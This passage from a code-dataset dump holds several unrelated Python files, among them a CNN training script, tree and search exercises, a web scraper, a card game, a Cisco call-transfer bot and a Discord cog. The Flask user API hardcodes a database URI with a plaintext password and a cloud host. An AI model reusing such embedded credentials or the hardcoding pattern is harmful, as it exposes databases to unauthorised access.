lr=LEARNING_RATE, weight_decay=1e-4)\ndevice = 'cuda:0'\n\nr_loss, r_acc = [], []\ni_loss, i_acc = [], []\n\n# %%\n# Plot information\n\nwith torch.cuda.device(0):\n macs, params = get_model_complexity_info(res, (3, 32, 32), as_strings=True, verbose=False)\n print('{:<30} {:<8}'.format('Computational complexity: ', macs))\n print('{:<30} {:<8}'.format('Number of parameters: ', params))\n\n macs, params = get_model_complexity_info(ires, (3, 32, 32), as_strings=True, verbose=False)\n 
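# report the same complexity figures for MobileNetV2\n    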
print('{:<30} {:<8}'.format('Computational complexity: ', macs))\n print('{:<30} {:<8}'.format('Number of parameters: ', params))\n\n# %%\n# Training Resnet50\n \nfor epoch in range(NUM_EPOCH):\n start = time.time()\n res.train()\n losses = 0.0\n for i, data in enumerate(train_loader):\n image = data[0].cuda(device)\n label = data[1].cuda(device)\n torch.cuda.synchronize()\n start_f = time.time()\n pred_label = res(image)\n torch.cuda.synchronize()\n estimate_f = time.time() - start_f\n if i == 0 and epoch == 0:\n print(f\"forward path : {estimate_f} sec\")\n loss = CRITERION(pred_label, label)\n losses += loss.item()\n\n optimizer1.zero_grad()\n torch.cuda.synchronize()\n start_b = time.time()\n loss.backward()\n torch.cuda.synchronize()\n estimate_b = time.time() - start_b\n if i == 0 and epoch == 0:\n print(f\"backward path : {estimate_b} sec\")\n optimizer1.step()\n avg_loss = losses/len(train_loader)\n r_loss.append(avg_loss)\n\n\n res.eval()\n pred_labels = []\n real_labels = []\n\n for i, data in enumerate(test_loader):\n image = data[0].cuda(device)\n label = data[1].cuda(device)\n real_labels += list(label.cpu().detach().numpy())\n \n pred_label = res(image)\n pred_label = list(pred_label.cpu().detach().numpy())\n pred_labels += pred_label\n \n real_labels = np.array(real_labels)\n pred_labels = np.array(pred_labels)\n pred_labels = pred_labels.argmax(axis=1)\n acc = sum(real_labels==pred_labels)/len(real_labels)*100\n r_acc.append(acc)\n\n if epoch % 5 == 0:\n print(f\"[{epoch}/{NUM_EPOCH}] : {r_loss[epoch]}\")\n \n if epoch == 0:\n estimate = (time.time() - start) * NUM_EPOCH\n print(f\"Estimated total = {estimate // 60} min {estimate % 60} sec\")\n\n# %%\n# Training MobileNetV2\n\nfor epoch in range(NUM_EPOCH):\n\n ires.train()\n losses = 0.0\n for i, data in enumerate(train_loader):\n image = data[0].cuda(device)\n label = data[1].cuda(device)\n torch.cuda.synchronize()\n start_f2 = time.time()\n pred_label = ires(image)\n torch.cuda.synchronize()\n estimate_f2 = time.time() - start_f2\n if i == 0 and epoch == 0:\n print(f\"forward path : {estimate_f2} sec\")\n loss = CRITERION(pred_label, label)\n losses += loss.item()\n\n optimizer2.zero_grad()\n torch.cuda.synchronize()\n start_b = time.time()\n loss.backward()\n torch.cuda.synchronize()\n estimate_b = time.time() - start_b\n if i == 0 and epoch == 0:\n print(f\"backward path : {estimate_b} sec\")\n optimizer2.step()\n avg_loss = losses/len(train_loader)\n i_loss.append(avg_loss)\n\n\n ires.eval()\n pred_labels = []\n real_labels = []\n\n for i, data in enumerate(test_loader):\n image = data[0].cuda(device)\n label = data[1].cuda(device)\n real_labels += list(label.cpu().detach().numpy())\n \n pred_label = ires(image)\n pred_label = list(pred_label.cpu().detach().numpy())\n pred_labels += pred_label\n \n real_labels = np.array(real_labels)\n pred_labels = np.array(pred_labels)\n pred_labels = pred_labels.argmax(axis=1)\n acc = sum(real_labels==pred_labels)/len(real_labels)*100\n i_acc.append(acc)\n \n if epoch % 5 == 0:\n print(f\"[{epoch}/{NUM_EPOCH}] : {i_loss[epoch]}\")\n\n# %%\n# Plot graph\n\nfigure(num=None, figsize=(14, 6), dpi=80, facecolor='w', edgecolor='k')\nplt.subplot(121)\nline1, = plt.plot(r_loss)\nline2, = plt.plot(i_loss)\nplt.legend(labels=(\"Residual\", \"Inverted\"))\nplt.grid()\n\n\nplt.subplot(122)\nline1, = plt.plot(r_acc)\nline2, = plt.plot(i_acc)\nplt.legend(labels=(\"Residual\", 
\"Inverted\"))\nplt.grid()\nplt.show()\n\n\n","repo_name":"SteveJayH/AI502_Midterm_Project","sub_path":"mobilenet_resnet.py","file_name":"mobilenet_resnet.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23882972600","text":"from os import *\nfrom sys import *\nfrom collections import *\nfrom math import *\n\nfrom sys import stdin, setrecursionlimit\nfrom queue import Queue\nsetrecursionlimit(10**7)\n\n\n# Binary tree node class for reference\nclass BinaryTreeNode:\n def __init__(self, data):\n self.val = data\n self.left = None\n self.right = None\n\n# ----------------------\ndef getLevelOrder(root):\n \n # Approach: BFS traversal of Tree\n # Time Complexity: O(N)\n # Space Complexity: O(N)\n traversal = []\n queue = [root]\n \n def levelorder_traversal(node):\n while(queue): # Until queue not empty\n # 1. Pop element in front\n curr_node = queue.pop(0) \n # 2. Append to Traversal\n traversal.append(curr_node.val)\n # 3. Push left node\n if curr_node.left:\n queue.append(curr_node.left)\n # 4. Push Right node\n if curr_node.right:\n queue.append(curr_node.right)\n \n # If tree exists\n if root:\n levelorder_traversal(root)\n \n return traversal\n# ----------------------\n\n# Fast input\ndef takeInput():\n\n arr = list(map(int, stdin.readline().strip().split(\" \")))\n\n rootData = arr[0]\n\n n = len(arr)\n\n if(rootData == -1):\n return None\n\n root = BinaryTreeNode(rootData)\n q = Queue()\n q.put(root)\n index = 1\n while(q.qsize() > 0):\n currentNode = q.get()\n\n leftChild = arr[index]\n\n if(leftChild != -1):\n leftNode = BinaryTreeNode(leftChild)\n currentNode.left = leftNode\n q.put(leftNode)\n\n index += 1\n rightChild = arr[index]\n\n if(rightChild != -1):\n rightNode = BinaryTreeNode(rightChild)\n currentNode .right = rightNode\n q.put(rightNode)\n\n index += 1\n\n return root\n\n\ndef printAns(ans):\n for x in ans:\n print(x, end=\" \")\n print()\n\n\n# main\nT = int(stdin.readline().strip())\nfor i in range(T):\n root = takeInput()\n ans = getLevelOrder(root)\n printAns(ans)\n","repo_name":"sanafathima418/StriverSDESheet","sub_path":"Trees/level_order_traversal.py","file_name":"level_order_traversal.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2566898850","text":"from urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = \"http://abbaflix.com/frah\"\r\nhtml = urlopen(url).read()\r\nsoup = BeautifulSoup(html, features=\"html.parser\")\r\n\r\n# kill all script and style elements\r\nfor script in soup([\"script\", \"style\"]):\r\n script.extract() # rip it out\r\n\r\n# get text\r\ntext = soup.get_text()\r\n\r\n# break into lines and remove leading and trailing space on each\r\nlines = (line.strip() for line in text.splitlines())\r\n# break multi-headlines into a line each\r\nchunks = (phrase.strip() for line in lines for phrase in line.split(\" \"))\r\n# drop blank lines\r\ntext = '\\n'.join(chunk for chunk in chunks if chunk)\r\n\r\n#print(text)\r\n\r\n\r\nfile = open(\"text_file.txt\", \"w\")\r\nfile.write(text)\r\nfile.close\r\n\r\n# Open the file in read mode\r\ntext = open(\"text_file.txt\", \"r\")\r\n\r\n# Create an empty dictionary\r\nd = dict()\r\n\r\n# Loop through each line of the file\r\nfor line in text:\r\n\t# Remove the leading spaces and newline character\r\n\tline = line.strip()\r\n\r\n\t# Convert the characters in line 
to\r\n\t# lowercase to avoid case mismatch\r\n\tline = line.lower()\r\n\r\n\t# Split the line into words\r\n\twords = line.split(\" \")\r\n\r\n\t# Iterate over each word in line\r\n\tfor word in words:\r\n\t\t# Check if the word is already in dictionary\r\n\t\tif word in d:\r\n\t\t\t# Increment count of word by 1\r\n\t\t\td[word] = d[word] + 1\r\n\t\telse:\r\n\t\t\t# Add the word to dictionary with count 1\r\n\t\t\td[word] = 1\r\n\r\ntext.close()\r\n\r\n# Print the contents of dictionary\r\nfor key in list(d.keys()):\r\n\tprint(key, \":\", d[key])\r\n","repo_name":"dennisntoiti/web-scrapper","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29678946124","text":"def binarySearch(arr, num, start, end):\n    if start > end:\n        return -1\n    mid = start + (end - start)//2\n    if arr[mid] == num:\n        return mid\n    elif arr[mid] < num:\n        return binarySearch(arr, num, mid + 1, end)\n    else:\n        return binarySearch(arr, num, start, mid - 1)\n\nif __name__ == \"__main__\":\n    n = int(input(\"Enter number of elements: \"))\n    array = []\n    print(\"Enter the elements in sorted order:\")\n    for i in range(n):\n        x = int(input(\"\"))\n        array.append(x)\n    num = int(input(\"Enter the element to search: \"))\n    pos = binarySearch(array, num, 0, len(array)-1)\n    if pos == -1:\n        print(\"Element is not present in the array\")\n    else:\n        print(f\"Element found at position {pos} in the array\")\n\n    \n","repo_name":"N0vice17/DSA-with-Java","sub_path":"Searching_Algorithm/PYTHON/BinarySearch_UsingRecursion.py","file_name":"BinarySearch_UsingRecursion.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"31111758596","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy.exc import CompileError, DataError, IntegrityError, OperationalError\n\n#Connect to the AWS RDS postgres instance\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql+psycopg2://User_database:12345678@userinstance.cacpqjasklix.us-east-1.rds.amazonaws.com:5432/User_database'\ndb = SQLAlchemy(app)\n\nfrom user import User\nimport util\nfrom flask import Response\nfrom functools import wraps\nimport json\nimport flask\nfrom util import response\nimport uuid\n\n#Create or update tables in the database\ndb.create_all()\n\ndef json_api(f):\n    @wraps(f)\n    def decorated_function(*args, **kwargs):\n        result = f(*args, **kwargs)\n        json_result = util.to_json(result)\n        return Response(response=json_result, status=200, mimetype=\"application/json\")\n\n    return decorated_function\n\n@app.route(\"/\")\ndef hello():\n    return \"Hello World!\"\n\n\n#Create a new user with unique email id\n@app.route(\"/users/create/\", methods=[\"POST\"])\n@json_api\ndef create_user():\n    try:\n        data = json.loads((flask.request.data).decode('utf-8'))\n        user_1 = User(id=uuid.uuid4(),\n                      first_name=data[\"first_name\"],\n                      last_name=data[\"last_name\"],\n                      credit=data[\"credit\"],\n                      email=data[\"email\"])\n\n        db.session.add(user_1)\n        db.session.commit()\n        return response(user_1.get_data(), True)\n    except KeyError as e:\n        if e.args[0] == 'credit':\n            user_1 = User(id=uuid.uuid4(),\n                          first_name = data[\"first_name\"],\n                          last_name = data[\"last_name\"],\n                          email = data[\"email\"])\n\n            db.session.add(user_1)\n            db.session.commit()\n            return response(user_1.get_data(), True)\n        else:\n            return response({\"message\": 'firstname, lastname, and email required'}, False)\n    except 
IntegrityError:\n        return response({'message': 'User with email: %s already exists' % data[\"email\"]}, False)\n\n\n#Delete a user from the user table\n@app.route(\"/users/remove/<user_id>\", methods=[\"DELETE\"])\n@json_api\ndef remove_user(user_id):\n    try:\n        obj = User.query.filter_by(id=user_id).one()\n        db.session.delete(obj)\n        db.session.commit()\n        return response({'message': 'User removed successfully'}, True)\n    except NoResultFound:\n        return response({'message': 'User not found'}, False)\n    except OperationalError:\n        return response({'message': 'Operational Error !!!'}, False)\n\n\n#Find user from the user table\n@app.route(\"/users/find/<user_id>\")\n@json_api\ndef find_user(user_id):\n    try:\n        user_1 = User.query.filter_by(id=user_id).one()\n        return response(user_1.get_data(), True)\n    except NoResultFound:\n        return response({'message': 'User not found'}, False)\n    except OperationalError as e:\n        return response({'message': str(e)}, False)\n\n\n#Find user credits\n@app.route(\"/users/credit/<user_id>\")\n@json_api\ndef find_credit(user_id):\n    try:\n        user_1 = User.query.filter_by(id=user_id).one()\n        return response(user_1.get_credit(), True)\n    except NoResultFound:\n        return response({'message': \"User's credit not found\"}, False)\n    except OperationalError:\n        return response({'message': 'Operational Error !!!'}, False)\n\n\n#Add money to user credits\n@app.route(\"/users/credit/add/<user_id>/<amount>\", methods=[\"POST\"])\n@json_api\ndef add_credit(user_id, amount):\n    try:\n        user_1 = User.query.filter_by(id=user_id).one()\n        user_1.credit = user_1.credit + float(amount)\n        db.session.commit()\n        return response(user_1.get_credit(), True)\n    except NoResultFound:\n        return response({'message': 'User not found'}, False)\n    except OperationalError:\n        return response({'message': 'Operational Error !!!'}, False)\n\n\n#Subtract money from user credits\n@app.route(\"/users/credit/subtract/<user_id>/<amount>\", methods=[\"POST\"])\n@json_api\ndef subtract_credit(user_id, amount):\n    try:\n        user_1 = User.query.filter_by(id=user_id).one()\n        curr_credit = user_1.credit\n        if curr_credit - float(amount) < 0:\n            return response({'message': 'Not enough credit!'}, False)\n        else:\n            user_1.credit = curr_credit - float(amount)\n            db.session.commit()\n            return response(user_1.get_credit(), True)\n    except NoResultFound:\n        return response({'message': 'User not found'}, False)\n    except ValueError as v_err:\n        return response({'message': str(v_err)}, False)\n    except OperationalError:\n        return response({'message': 'Operational Error !!!'}, False)\n","repo_name":"RafailSkoulos17/web_data_management_group_9","sub_path":"postgres_scripts/userapp/user_app.py","file_name":"user_app.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14396811340","text":"#! 
/usr/bin/env python3\n\nimport random\nimport sys\nimport copy\n\nclass Dealer(object):\n    def __init__(self,players_input):\n        self.__NUM_HAND = 10 # number of cards in the initial hand\n        self.__NUM_FIELD = 4 # number of rows on the field\n        self.__NUM_MAX_COLUMN = 5 # maximum number of cards in a field row\n        self.__MAX_CARD = 104 # highest card number\n        self.__players = players_input # list of player instances\n        self.__num_players = len(self.__players) # number of players\n        self.__num_cards = self.__NUM_HAND*self.__num_players # number of players x hand size\n        all_cards = random.sample(\n            range(1,self.__MAX_CARD+1),\n            self.__num_cards+self.__NUM_FIELD\n        ) # all cards in play\n        self.__each_hands = [\n            copy.deepcopy(all_cards[i*self.__NUM_HAND:(i+1)*self.__NUM_HAND])\n            for i in range(self.__num_players)\n        ] # each player's hand\n        self.__field = [\n            copy.deepcopy([all_cards[self.__num_cards+i]])\n            for i in range(self.__NUM_FIELD)\n        ] # cards on the field\n        self.__earned_cards = [\n            [] for i in range(self.__num_players)\n        ] # each player's collected cards\n        all_cards.clear()\n        for i in range(self.__num_players):\n            _player = self.__players[i]\n            _player.get_know_dealer(self) # tell the player the dealer instance\n            _player.get_hand(copy.deepcopy(self.__each_hands[i])) # deal the cards\n\n    # player accessible values #\n    @property\n    def num_hand(self):\n        return self.__NUM_HAND\n    @property\n    def num_field(self):\n        return self.__NUM_FIELD\n    @property\n    def max_card(self):\n        return self.__MAX_CARD\n    @property\n    def num_max_column(self):\n        return self.__NUM_MAX_COLUMN\n    @property\n    def num_players(self):\n        return self.__num_players\n    @property\n    def field(self):\n        return self.__field\n    @property\n    def played_cards(self):\n        return self.__played_cards\n    @property\n    def score(self):\n        return [self.__calc_score(self.__earned_cards[i])\n                for i in range(self.__num_players)\n               ]\n\n    # method that receives the played cards\n    def receive_cards(self):\n        self.__played_cards = [\n            player.put_card() for player in self.__players\n        ]\n        for i in range(self.__num_players):\n            if self.__played_cards[i] not in self.__each_hands[i]: # error handling\n                print(\"ERROR: You do NOT have the card:\"\n                      + str(self.__played_cards[i]) + \"!\"\n                     )\n                sys.exit(1)\n            self.__each_hands[i].remove(self.__played_cards[i])\n\n    # method that announces the played cards to the players\n    def open_cards(self):\n        for player in self.__players:\n            if hasattr(player,\"get_played_cards\"):\n                player.get_played_cards(self.__played_cards)\n\n    # method that lines up the played cards on the field; whoever places the 6th card in a row takes those cards\n    def line_up_cards(self):\n        self.__line_up_cards_recursive(copy.deepcopy(self.__played_cards))\n\n    # core part of line_up_cards\n    def __line_up_cards_recursive(self,rest_cards):\n        _most_right_field = [\n            max(self.__field[i]) for i in range(self.__NUM_FIELD)\n        ]\n        _min_field = min(_most_right_field)\n        _min_rest_cards = min(rest_cards)\n        _min_player = self.__played_cards.index(_min_rest_cards)\n        if _min_field > _min_rest_cards: # when a card lower than every field card is played\n            _replace_column = self.__players[_min_player].taking_column() # ask the player which row to take\n            if _replace_column not in range(self.__NUM_FIELD): # error handling\n                print(\"ERROR: You have to choose 0 or 1 or 2 or 3!\")\n                sys.exit(1)\n            for i in self.__field[_replace_column]:\n                self.__earned_cards[_min_player].append(i)\n            self.__field[_replace_column] = [_min_rest_cards]\n            rest_cards.remove(_min_rest_cards)\n        else: # place the cards on the field from lowest to highest\n            for i in sorted(_most_right_field,reverse=True):\n                if _min_rest_cards > i:\n                    _column = _most_right_field.index(i)\n                    self.__field[_column].append(_min_rest_cards)\n                    rest_cards.remove(_min_rest_cards)\n                    # when more than self.__NUM_MAX_COLUMN (=5) cards end up in one row\n                    if len(self.__field[_column]) > self.__NUM_MAX_COLUMN:\n                        for j in range(self.__NUM_MAX_COLUMN):\n                            
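# the player of the 6th card collects the first five cards of the row\n                            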
self.__earned_cards[_min_player].append(\n                                self.__field[_column].pop(0)\n                            )\n                    break\n        if len(rest_cards) > 0: # recurse until all played cards (rest_cards) are processed\n            self.__line_up_cards_recursive(rest_cards)\n\n    def print_score(self): # print the scores\n        _score = [\n            self.__calc_score(_earned_cards)\n            for _earned_cards in self.__earned_cards\n        ]\n        print(\"score:\\n\",_score)\n\n    def __calc_score(self,cards): # submethod for score calculation\n        _sum = 0\n        for i in cards:\n            if self.__bool_same_digit(i):\n                if i % 5 == 0:\n                    _sum += 7\n                else:\n                    _sum += 5\n            elif i % 10 == 0:\n                _sum += 3\n            elif i % 5 == 0:\n                _sum += 2\n            else:\n                _sum += 1\n        return _sum\n    def __bool_same_digit(self,num):\n        if int(num/10) == 0:\n            return False\n        else:\n            _1st_digit = int(num%10)\n            while True:\n                num = int(num/10)\n                if num == 0:\n                    break\n                if _1st_digit != int(num%10):\n                    return False\n            return True\n\n    def print_field(self):\n        print(\"field:\")\n        for i in range(self.__NUM_FIELD):\n            print(self.__field[i])\n\n    def print_played_cards(self):\n        print(\"played Cards:\\n\",self.__played_cards)\n\n### basic Player class (everyone can use this one) ###\nclass Player(object):\n    ### required methods (4 of them) ###\n    def get_know_dealer(self,dealer_input): # get the dealer instance\n        self.dealer = dealer_input\n    def get_hand(self,my_cards_input): # called by the dealer to hand over the cards\n        self.my_cards = my_cards_input\n    def put_card(self): # called by the dealer to ask which card to play\n        return self.my_cards.pop(0)\n    def taking_column(self): # called by the dealer when you played the lowest card, to ask which row to take\n        return 0\n    def get_played_cards(self,dealer_input):\n        self.played_cards = dealer_input\n\n    def get_field(self): # get the state of the field\n        self.field = self.dealer.field\n","repo_name":"progSeminarG/nimmt","sub_path":"nimmt_Dealer.py","file_name":"nimmt_Dealer.py","file_ext":"py","file_size_in_byte":7338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26535250731","text":"from functions import *\nimport cv2\nimport win32gui, win32con, win32api\nimport numpy as np\n\nCALL_NUMBER = '10645'\n\nwhile True:\n    try:\n        inCall = detect_updating_screen('templates/bIncoming.PNG', \"Cisco IP Communicator\")\n        if inCall != 0:\n            print(\"Incoming call\")\n            bCall = get_object_coord('templates/bAnswer.png', \"Cisco IP Communicator\")\n            if bCall != 0:\n                click(bCall[0], bCall[1])\n                time.sleep(0.5)\n                bTransferAgent = detect_updating_screen('templates/bTransferAgent.PNG', \"Cisco Agent Desktop\")\n                if bTransferAgent != 0:\n                    pyautogui.click(bTransferAgent[0], bTransferAgent[1])\n                    time.sleep(0.5)\n                    bDigits = getNumbers(\"Передать вызов\")\n                    for i in CALL_NUMBER:\n                        click(bDigits[int(i)][0], bDigits[int(i)][1])\n                    time.sleep(0.5)\n                    baTransfer = get_object_coord('templates/baTransfer.PNG', \"Передать вызов\")\n                    if baTransfer != 0:\n                        click(baTransfer[0], baTransfer[1])\n                        time.sleep(0.5)\n                        bTransfer = detect_updating_screen('templates/bTransfer.PNG', \"Cisco IP Communicator\")\n                        if bTransfer != 0:\n                            click(bTransfer[0], bTransfer[1])\n                            print(\"Call was transferred\")\n        else:\n            time.sleep(1)\n    except Exception as e:\n        print(\"error: \", e)\n\n# cv2.imshow('output', d)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n\n","repo_name":"surru2/openCV-bot","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71248112167","text":"from discord.abc import GuildChannel\nfrom discord.ext import commands\nfrom discord import Embed, RawReactionActionEvent, RawBulkMessageDeleteEvent, RawMessageDeleteEvent, NotFound, \\\n    
InvalidArgument, HTTPException, TextChannel, Forbidden, Role, Message\nfrom discord.ext.commands import BadArgument\nfrom discord_slash import cog_ext, SlashContext, SlashCommandOptionType\nfrom discord_slash.utils import manage_commands\n\nfrom administrator import db, slash\nfrom administrator.check import is_enabled, guild_only, has_permissions\nfrom administrator.logger import logger\nfrom administrator.utils import event_is_enabled, get_message_by_url\n\nextension_name = \"rorec\"\nlogger = logger.getChild(extension_name)\n\n\nclass RoRec(commands.Cog):\n    def __init__(self, bot: commands.Bot):\n        self.bot = bot\n        slash.get_cog_commands(self)\n\n    def description(self):\n        return \"Create role-reaction message to give role from a reaction add\"\n\n    @staticmethod\n    async def get_message(session: db.Session, ctx: SlashContext, url: str) -> db.RoRec:\n        m = session.query(db.RoRec).filter(db.RoRec.message == (await get_message_by_url(ctx, url)).id,\n                                           db.RoRec.guild == ctx.guild.id).first()\n        if not m:\n            raise BadArgument()\n        else:\n            return m\n\n    async def try_emoji(self, msg: Message, emoji: str):\n        try:\n            await msg.add_reaction(emoji)\n        except (HTTPException, NotFound, InvalidArgument):\n            raise BadArgument()\n        else:\n            await (await msg.channel.fetch_message(msg.id)).remove_reaction(emoji, self.bot.user)\n\n    @cog_ext.cog_subcommand(base=\"rorec\", name=\"new\",\n                            description=\"Create a new role-reaction message on the mentioned channel\",\n                            options=[\n                                manage_commands.create_option(\"title\", \"The title\",\n                                                              SlashCommandOptionType.STRING, True),\n                                manage_commands.create_option(\"channel\", \"The target channel\",\n                                                              SlashCommandOptionType.CHANNEL, True),\n                                manage_commands.create_option(\"description\", \"The description\",\n                                                              SlashCommandOptionType.STRING, False),\n                                manage_commands.create_option(\"one\", \"If only one role is packable\",\n                                                              SlashCommandOptionType.BOOLEAN, False)\n                            ])\n    @is_enabled()\n    @guild_only()\n    @has_permissions(manage_roles=True)\n    async def rorec_new(self, ctx: SlashContext, title: str, channel: GuildChannel, description: str = \"\",\n                        one: bool = False):\n        if not isinstance(channel, TextChannel):\n            raise BadArgument()\n\n        embed = Embed(title=title, description=description)\n        embed.add_field(name=\"Roles\", value=\"No role yet...\")\n        message = await channel.send(embed=embed)\n        r = db.RoRec(message.id, channel.id, ctx.guild.id, one)\n        s = db.Session()\n        s.add(r)\n        s.commit()\n        s.close()\n        await ctx.send(content=\"\\U0001f44d\")\n\n    @cog_ext.cog_subcommand(base=\"rorec\", name=\"edit\",\n                            description=\"Edit a role-reaction message title and description\",\n                            options=[\n                                manage_commands.create_option(\"url\", \"The message url\",\n                                                              SlashCommandOptionType.STRING, True),\n                                manage_commands.create_option(\"title\", \"The new title\",\n                                                              SlashCommandOptionType.STRING, True),\n                                manage_commands.create_option(\"description\", \"The new description\",\n                                                              SlashCommandOptionType.STRING, False)\n                            ])\n    @is_enabled()\n    @guild_only()\n    @has_permissions(manage_roles=True)\n    async def rorec_edit(self, ctx: SlashContext, url: str, title: str, description: str = \"\"):\n        s = db.Session()\n        m = await self.get_message(s, ctx, url)\n        s.close()\n\n        message = await ctx.guild.get_channel(m.channel).fetch_message(m.message)\n        embed: Embed = message.embeds[0]\n        embed.title = title\n        embed.description = description\n        await message.edit(embed=embed)\n        await ctx.send(content=\"\\U0001f44d\")\n\n    @cog_ext.cog_subcommand(base=\"rorec\", name=\"set\",\n                            description=\"Add/edit an emoji with linked roles\",\n                            
options=[\n                                manage_commands.create_option(\"url\", \"The message url\",\n                                                              SlashCommandOptionType.STRING, True),\n                                manage_commands.create_option(\"emoji\", \"The emoji\",\n                                                              SlashCommandOptionType.STRING, True),\n                                manage_commands.create_option(\"role\", \"The role\",\n                                                              SlashCommandOptionType.ROLE, True)\n                            ])\n    @is_enabled()\n    @guild_only()\n    @has_permissions(manage_roles=True)\n    async def rorec_set(self, ctx: SlashContext, url: str, emoji: str, role: Role):\n        await ctx.send(content=\"\\U000023f3\")\n        s = db.Session()\n        m = await self.get_message(s, ctx, url)\n\n        await ctx.delete()\n        msg = await ctx.channel.send(\"\\U000023f3\")\n        await self.try_emoji(msg, emoji)\n\n        data = m.get_data()\n        data[emoji] = list(map(lambda x: x.id, [role]))\n        m.set_data(data)\n        await self.rorec_update(m)\n        s.commit()\n        s.close()\n        await msg.edit(content=\"\\U0001f44d\")\n\n    @cog_ext.cog_subcommand(base=\"rorec\", name=\"remove\",\n                            description=\"Remove an emoji from a role-reaction message\",\n                            options=[\n                                manage_commands.create_option(\"url\", \"The message url\",\n                                                              SlashCommandOptionType.STRING, True),\n                                manage_commands.create_option(\"emoji\", \"The emoji\",\n                                                              SlashCommandOptionType.STRING, True)\n                            ])\n    @is_enabled()\n    @guild_only()\n    @has_permissions(manage_roles=True)\n    async def rorec_remove(self, ctx: SlashContext, url: str, emoji: str):\n        await ctx.send(content=\"\\U000023f3\")\n        s = db.Session()\n        m = await self.get_message(s, ctx, url)\n\n        await ctx.delete()\n        msg = await ctx.channel.send(\"\\U000023f3\")\n        await self.try_emoji(msg, emoji)\n\n        data = m.get_data()\n        if emoji not in data:\n            raise BadArgument()\n        del data[emoji]\n        m.set_data(data)\n\n        await self.rorec_update(m)\n        s.commit()\n        s.close()\n        await msg.edit(content=\"\\U0001f44d\")\n\n    @cog_ext.cog_subcommand(base=\"rorec\", name=\"reload\",\n                            description=\"Reload the message and the reactions\",\n                            options=[manage_commands.create_option(\"url\", \"The message url\",\n                                                                   SlashCommandOptionType.STRING, True)])\n    @is_enabled()\n    @guild_only()\n    @has_permissions(manage_roles=True)\n    async def rorec_reload(self, ctx: SlashContext, url: str):\n        s = db.Session()\n        m = await self.get_message(s, ctx, url)\n\n        await self.rorec_update(m)\n        s.close()\n        await ctx.send(content=\"\\U0001f44d\")\n\n    @cog_ext.cog_subcommand(base=\"rorec\", name=\"delete\",\n                            description=\"Remove a role-reaction message\",\n                            options=[manage_commands.create_option(\"url\", \"The message link\",\n                                                                   SlashCommandOptionType.STRING, True)])\n    @is_enabled()\n    @guild_only()\n    @has_permissions(manage_roles=True)\n    async def rorec_delete(self, ctx: SlashContext, url: str):\n        msg = await get_message_by_url(ctx, url)\n        s = db.Session()\n        await self.get_message(s, ctx, url)\n        s.close()\n        await msg.delete()\n        await ctx.send(content=\"\\U0001f44d\")\n\n    async def rorec_update(self, m: db.RoRec):\n        channel = self.bot.get_channel(m.channel)\n        if not channel:\n            return\n        message = await channel.fetch_message(m.message)\n        if not message:\n            return\n        embed: Embed = message.embeds[0]\n        name = embed.fields[0].name\n        embed.remove_field(0)\n        value = \"\"\n        data = m.get_data()\n        await message.clear_reactions()\n        for d in data:\n            value += f\"{d}: \"\n            value += \", \".join(map(lambda x: self.bot.get_guild(m.guild).get_role(x).mention, data[d]))\n            value += \"\\n\"\n            await message.add_reaction(d)\n        if not value:\n            value = \"No role yet...\"\n        embed.add_field(name=name, value=value)\n        await message.edit(embed=embed)\n\n    @commands.Cog.listener()\n    async def on_raw_message_delete(self, message: RawMessageDeleteEvent):\n        s = 
db.Session()\n r = s.query(db.RoRec).filter(db.RoRec.message == message.message_id).first()\n if r:\n s.delete(r)\n s.commit()\n s.close()\n\n @commands.Cog.listener()\n async def on_raw_bulk_message_delete(self, messages: RawBulkMessageDeleteEvent):\n s = db.Session()\n for id in messages.message_ids:\n r = s.query(db.RoRec).filter(db.RoRec.message == id).first()\n if r:\n s.delete(r)\n s.commit()\n s.close()\n\n @commands.Cog.listener()\n async def on_guild_channel_delete(self, channel: GuildChannel):\n if isinstance(channel, TextChannel):\n s = db.Session()\n for r in s.query(db.RoRec).filter(db.RoRec.channel == channel.id).all():\n s.delete(r)\n s.commit()\n s.close()\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload: RawReactionActionEvent):\n s = db.Session()\n if payload.guild_id and not event_is_enabled(self.qualified_name, payload.guild_id, s):\n return\n m = s.query(db.RoRec).filter(db.RoRec.message == payload.message_id).first()\n s.close()\n if m and payload.member.id != self.bot.user.id:\n data = m.get_data()\n emoji = str(payload.emoji)\n if emoji in data:\n guild = self.bot.get_guild(payload.guild_id)\n roles = [guild.get_role(r) for r in data[emoji]]\n add = False\n\n if m.one:\n del data[emoji]\n remove_roles = []\n [remove_roles.extend(map(lambda x: guild.get_role(x), data[e])) for e in data]\n await payload.member.remove_roles(*remove_roles, reason=\"Only one role-reaction message\")\n\n for r in filter(lambda x: x not in payload.member.roles, roles):\n try:\n await payload.member.add_roles(r, reason=\"Role-reaction message\")\n add = True\n except Forbidden:\n await payload.member.send(\"I don't have the permission to add a role to you !\")\n\n if not add:\n try:\n await payload.member.remove_roles(*roles, reason=\"Role-reaction message\")\n except Forbidden:\n await payload.member.send(\"I don't have the permission to remove one of your roles !\")\n\n await (await self.bot.get_channel(payload.channel_id).fetch_message(payload.message_id))\\\n .remove_reaction(payload.emoji, payload.member)\n\n\ndef setup(bot):\n logger.info(f\"Loading...\")\n try:\n bot.add_cog(RoRec(bot))\n except Exception as e:\n logger.error(f\"Error loading: {e}\")\n else:\n 